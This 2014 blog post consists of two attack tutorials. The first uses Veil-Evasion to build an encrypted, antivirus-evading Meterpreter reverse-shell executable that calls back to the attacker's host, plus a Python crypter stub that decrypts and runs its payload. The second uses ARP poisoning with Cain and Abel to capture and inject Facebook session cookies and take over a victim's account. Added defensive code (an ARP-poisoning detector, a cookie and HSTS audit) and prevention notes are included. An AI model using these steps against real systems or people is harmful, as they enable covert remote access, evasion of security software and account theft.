Tuesday 23 September 2014

BYPASSING ANTIVIRUS USING VEIL-FRAMEWORK



Veil is a Python framework that automates the creation of payloads intended to evade antivirus. Veil-Evasion, the module used here, generates executable payloads that get past common signature-based antivirus products: every payload is built with fresh randomness (randomised variable names, a new encryption key and encoding on each run), so no two builds share a signature.
Installing Veil


USING KALI OR BACKTRACK

kali download link:







To install, open a terminal and type "apt-get update && apt-get install veil".
To run the program, type "veil-evasion".

This brings you to the main menu. Type "list" to see the numbered list of available payloads, then select one and configure it:
[>] Please enter a command: use 27
[>] Please enter a command: set use_pyherion Y
[>] Please enter a command: generate
"use 27" picks payload number 27 from that list (the numbering changes between Veil versions, so read it off your own "list" output rather than copying the number). "set use_pyherion Y" switches on pyherion, Veil's Python crypter, which only exists for the Python-based payloads: it encrypts the generated source and wraps it in a small stub that decrypts and executes it at run time. "generate" starts the build, and the first thing Veil asks is where the shellcode should come from.
Select msfvenom as the shellcode source by typing "1":
[>] Please enter the number of your choice : 1
Enter metasploit payload: "windows/meterpreter/reverse_tcp"
Enter value for 'LHOST', [tab] for local IP: "192.168.31.20"
Enter value for 'LPORT': "443"
LHOST is your own address, the one the victim machine will connect back to, so a matching listener (exploit/multi/handler in msfconsole with the same payload, LHOST and LPORT) must be running before the executable is launched on the target. Port 443 is chosen because outbound traffic to it looks like HTTPS and is rarely blocked by egress filtering. Press enter and Veil asks for a name for the payload; here it is "payload", but any name will do.



Veil then asks how to turn the generated Python source into a Windows executable. Choose Pyinstaller by typing "1"; it bundles the script together with a Python interpreter into a single stand-alone .exe, so the target does not need Python installed.
[>] Please enter the number of your choice : 1
Press enter and the build runs. The finished executable is written to "/root/Veil-output/compiled/"; Veil keeps the generated source and a Metasploit resource file for the matching handler in sibling directories of the same output folder.
The Python programmers reading this will appreciate the source code that is produced. Look at this beautiful hot mess of a program! Every variable name is randomised and the payload itself is encrypted and encoded, so each build is a different file with a different hash and there is no fixed byte pattern for a signature-based scanner to match. One caveat: do not upload the result to VirusTotal or a similar multi-engine scanner to see whether it is detected; the sample is shared with the vendors and the build is burned. Test it against a local copy of the antivirus you expect to meet instead.
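To make that "hot mess" concrete, here is an added example (not code from Veil or from this post) of the wrapping pyherion performs: the payload source is compressed, encrypted with a key generated for this build, base64-encoded and embedded in a stub whose variable names are random and which decrypts and exec()s the original at run time. pyherion uses AES from PyCrypto; this stand-in uses repeating-key XOR so that it runs with the standard library alone, and the wrapped "payload" is a constructed, benign assignment rather than shellcode.

```python
import base64
import keyword
import os
import random
import zlib

# Constructed, benign stand-in for the payload source Veil would wrap. A real
# Veil build puts the msfvenom shellcode injector here; this only sets a marker.
PAYLOAD_SOURCE = 'marker = "payload ran"'


def random_name(rng: random.Random, used: set) -> str:
    """Return a fresh, valid Python identifier that is not a keyword and
    has not been handed out before in this build."""
    letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    while True:
        length = rng.randint(8, 16)
        name = rng.choice(letters) + "".join(
            rng.choice(letters + "0123456789") for _ in range(length - 1)
        )
        if not keyword.iskeyword(name) and name not in used:
            used.add(name)
            return name


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; stands in for the AES layer pyherion applies."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_stub(source: str) -> str:
    """Wrap `source` the way a Python crypter does: compress, encrypt with a
    fresh random key, base64 both key and blob, and emit a loader whose
    identifiers are randomised. Every call yields a different file."""
    rng = random.SystemRandom()
    used: set = set()
    key = os.urandom(32)  # new key per build, so every output differs
    blob = base64.b64encode(xor_bytes(zlib.compress(source.encode()), key)).decode()
    key_b64 = base64.b64encode(key).decode()
    n_key, n_blob, n_plain = (random_name(rng, used) for _ in range(3))
    # The loader: decode key and blob, undo the XOR, decompress, exec.
    return (
        "import base64, zlib\n"
        f'{n_key} = base64.b64decode("{key_b64}")\n'
        f'{n_blob} = base64.b64decode("{blob}")\n'
        f"{n_plain} = bytes(b ^ {n_key}[i % len({n_key})] for i, b in enumerate({n_blob}))\n"
        f"exec(zlib.decompress({n_plain}).decode())\n"
    )


def run_stub(stub: str) -> dict:
    """Execute a generated stub in a fresh namespace and return that namespace,
    so the caller can confirm the wrapped payload actually ran."""
    namespace: dict = {}
    exec(stub, namespace)
    return namespace


if __name__ == "__main__":
    first, second = build_stub(PAYLOAD_SOURCE), build_stub(PAYLOAD_SOURCE)
    print(first)
    print("two builds identical:", first == second)
    print("payload executed:", run_stub(first).get("marker"))
```

Running it twice and hashing the two stubs gives two different digests, which is the whole point of the randomness Veil advertises: a scanner that keys on a file hash or on a fixed byte sequence in the loader has nothing stable to match. Note that the decryption key is embedded in the file, so the layer protects against static signatures only; an engine that emulates the Python interpreter, or a sandbox that runs the sample, sees the same plaintext the victim does.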

HTTP SESSION HIJACKING



Procedure:

1. Install Wireshark, Cain and Abel, Greasemonkey (for Firefox) and the Cookie Injector user script. (Note: Cain and Abel ships its own WinPcap; if Wireshark already installed WinPcap, do not install it a second time, or the capture driver will misbehave.)

2. Start Wireshark.

3. Go to Capture -> Interfaces (Ctrl+I), select the interface the traffic passes through (eth0 or wlan0) and click Start.

4. Start Cain and Abel.

5. Click Configure, select the same interface card, and click OK.

6. Start the Sniffer.

7. Go to the Sniffer tab.

8. Click "Add items to the current list".

9. A MAC address scanner comes up; select "All hosts in my subnet" and click OK.

10. The IP addresses and MAC addresses of the discovered hosts now appear in the Sniffer tab.

11. Go to the APR (ARP Poison Routing) tab.

12. Click inside the upper list so that "Add items to the current list" becomes active, then click it. A New ARP Poison Routing dialog appears with a list of hosts on the left and on the right.

13. Select the target's IP address on the left; the list on the right then lets you pick the second address, which is the gateway. Click OK.

14. APR is now configured (its status shows Idle). Click Start APR. From this point Cain tells the victim that your MAC address belongs to the gateway and tells the gateway that your MAC address belongs to the victim, so both directions of the victim's traffic pass through your machine before being forwarded.

15. Move back to Wireshark and start analysing the traffic: the victim's packets are now flowing through your computer and show up in the capture.

16. If the victim logs in to, or is already logged in to, any site over plain HTTP, the session cookies are sent in the clear with every request, and you capture them.

17. In the Wireshark filter bar type
http.cookie contains datr
datr is the name of one of Facebook's cookies, so this filter shows only requests that carry a Facebook Cookie header.

18. Wireshark now lists only the packets containing that cookie. Right-click the Cookie line and choose Copy > Bytes > Printable Text Only.

19. Open Firefox, browse to the site whose cookies you captured, and press Alt+C. The Wireshark Cookie Dump dialog from Cookie Injector comes up; paste the text copied from Wireshark into it and click OK.

20. A Greasemonkey alert confirms that all cookies have been written.

21. Refresh the page. You are now in the victim's account.

Result: HTTP session hijacked by rerouting the victim's traffic through Cain and Abel, a man-in-the-middle (MITM) attack.
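The poisoning in steps 11 to 14 is also the easiest part of this attack to spot from the defender's side. The following is an added example, not part of the original post, of the two signals a host or an ARP monitor can alert on: the gateway's IP suddenly resolving to a different MAC, and one MAC address answering for several IPs, which is exactly what Cain does when it claims both the victim and the gateway. The ARP reply log is constructed; 192.168.31.20 is the attacker address used elsewhere on this page, and the gateway, victim and MAC addresses are invented for the example.

```python
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed ARP reply log as a monitor on the segment would see it:
# (seconds, sender IP, sender MAC). 192.168.31.1 is the gateway, .50 the
# victim and .20 the attacker running Cain; all MACs are invented.
ARP_LOG: List[Tuple[float, str, str]] = [
    (0.0, "192.168.31.1",  "00:50:56:01:02:03"),  # gateway answers normally
    (1.0, "192.168.31.50", "00:1a:2b:3c:4d:5e"),  # victim answers normally
    (2.0, "192.168.31.20", "00:0c:29:aa:bb:cc"),  # attacker's own, honest reply
    (5.0, "192.168.31.1",  "00:0c:29:aa:bb:cc"),  # APR starts: attacker claims the gateway
    (5.1, "192.168.31.50", "00:0c:29:aa:bb:cc"),  # ... and claims the victim too
]


def detect_arp_poisoning(log: List[Tuple[float, str, str]], gateway_ip: str) -> List[str]:
    """Replay an ARP reply log and alert on the two APR symptoms:
    an IP whose MAC changes (worst when it is the gateway) and a MAC that
    answers for more than one IP."""
    ip_to_mac: Dict[str, str] = {}
    mac_to_ips: Dict[str, Set[str]] = defaultdict(set)
    alerts: List[str] = []
    for t, ip, mac in log:
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            role = "GATEWAY" if ip == gateway_ip else "host"
            alerts.append(f"t={t}: {role} {ip} moved from {previous} to {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append(f"t={t}: {mac} answers for {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_poisoning(ARP_LOG, "192.168.31.1"):
        print(line)
```

On the first three entries nothing fires; the two replies Cain sends at t=5.0 and t=5.1 produce four alerts, the first of them for the gateway. A real monitor needs an allow-list for legitimate MAC changes (NIC replacement, VRRP or HSRP failover on the gateway), but a single MAC that starts answering for both the gateway and a client within a second is the APR pattern and not a false positive.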


Prevention: serve the whole session over HTTPS, not only the login page, and mark the session cookies Secure (and HttpOnly) so the browser never sends them over plain HTTP even when a page is requested that way; enable HSTS so the browser refuses to be downgraded to http:// at all. On the network side, a static ARP entry for the gateway, Dynamic ARP Inspection on the switch, or an ARP monitor such as arpwatch catches the poisoning itself.
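Steps 16 to 18 are done by hand in Wireshark; what the filter and the copy actually pull out of the wire is shown by the following added example, which is not code from the original post. It parses a constructed plain-HTTP request the way a MITM captures it, applies the equivalent of the http.cookie contains datr filter, and returns the cookie jar that Cookie Injector is given. The second function is the defender's check from the prevention note: it audits a constructed Set-Cookie response for the Secure and HttpOnly attributes and for HSTS, the settings that would have kept the cookies off the plain-HTTP wire in the first place. Hostnames, cookie names and all values are constructed sample data.

```python
from typing import Dict, List, Optional, Tuple

# Constructed request, as the victim's browser sends it over plain HTTP and
# as Wireshark shows it after ARP poisoning. Cookie values are invented.
CAPTURED_REQUEST = (
    b"GET /home.php HTTP/1.1\r\n"
    b"Host: www.facebook.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: datr=AbCdEfGhIjKl; c_user=100000000000001; xs=1%3Aabc%3A2%3A1411480000\r\n"
    b"Accept: text/html\r\n"
    b"\r\n"
)

# Constructed response that sets those cookies without the Secure attribute
# and without HSTS, i.e. the server configuration the attack relies on.
CAPTURED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Set-Cookie: xs=1%3Aabc%3A2%3A1411480000; path=/; domain=.facebook.com\r\n"
    b"Set-Cookie: datr=AbCdEfGhIjKl; expires=Thu, 22-Sep-2016 00:00:00 GMT; "
    b"path=/; domain=.facebook.com; httponly\r\n"
    b"\r\n"
    b"<html>...</html>"
)


def parse_headers(raw: bytes) -> Tuple[str, Dict[str, List[str]]]:
    """Split one HTTP message into its start line and a header map. Names are
    lower-cased; repeated headers such as Set-Cookie keep every value."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def extract_session_cookies(raw: bytes, needle: str = "datr") -> Optional[Tuple[str, Dict[str, str]]]:
    """Equivalent of the Wireshark filter `http.cookie contains <needle>`:
    return (host, {cookie name: value}) for a request whose Cookie header
    contains the needle, or None when the request is not interesting."""
    _, headers = parse_headers(raw)
    cookie_header = "; ".join(headers.get("cookie", []))
    if needle not in cookie_header:
        return None
    host = headers.get("host", ["?"])[0]
    jar: Dict[str, str] = {}
    for part in cookie_header.split(";"):
        if "=" in part:
            name, _, value = part.strip().partition("=")
            jar[name] = value
    return host, jar


def audit_set_cookie(raw_response: bytes) -> List[str]:
    """Defender-side check: report every cookie the response sets without
    Secure or HttpOnly, and a missing Strict-Transport-Security header."""
    _, headers = parse_headers(raw_response)
    findings: List[str] = []
    for set_cookie in headers.get("set-cookie", []):
        name = set_cookie.split("=", 1)[0].strip()
        attrs = {attr.strip().lower() for attr in set_cookie.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(f"{name}: missing Secure, sent over plain HTTP with every request")
        if "httponly" not in attrs:
            findings.append(f"{name}: missing HttpOnly, readable by injected script")
    if "strict-transport-security" not in headers:
        findings.append("no Strict-Transport-Security header, browser can still be sent to http://")
    return findings


if __name__ == "__main__":
    print(extract_session_cookies(CAPTURED_REQUEST))
    for finding in audit_set_cookie(CAPTURED_RESPONSE):
        print(finding)
```

For the constructed traffic the extractor returns the host and the three cookies that get pasted into Cookie Injector, and the audit reports four findings: xs lacks both Secure and HttpOnly, datr lacks Secure, and there is no HSTS header. With Secure set on the session cookies the request in step 16 would never carry them, and the filter in step 17 would match nothing.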



NOTE: If you have any query or do not understand any step, do mail me.